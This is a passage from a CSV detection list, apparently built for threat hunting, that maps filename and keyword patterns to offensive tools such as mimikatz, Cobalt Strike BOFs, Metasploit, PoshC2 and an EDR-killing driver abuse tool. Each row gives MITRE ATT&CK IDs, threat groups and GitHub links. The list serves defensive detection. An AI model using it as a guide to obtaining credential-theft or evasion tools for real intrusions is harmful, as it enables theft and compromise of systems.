tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process::suspend*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*process_herpaderping*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_imports.cna*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_imports.x64*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","1","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_imports_api *.exe*","offensive_tool_keyword","cobaltstrike","A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL_Imports_BOF","1","0","N/A","10","10","80","10","2021-10-28T18:07:09Z","2021-10-27T21:02:44Z" +"*process_inject_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_allocator*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_bof_reuse_memory*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_execute*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_min_alloc*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_startrwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Process_Inject_Struct*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"*process_inject_transform_x*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*process_protection_enum *","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*process_protection_enum*.dmp*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10",,"N/A",,, +"*process_protection_enum.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*Process_Protection_Level_BOF.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*Process_Protection_Level_BOF/*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" +"*process_snapshot.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*ProcessCommandChannelImplantMessage*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" +"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 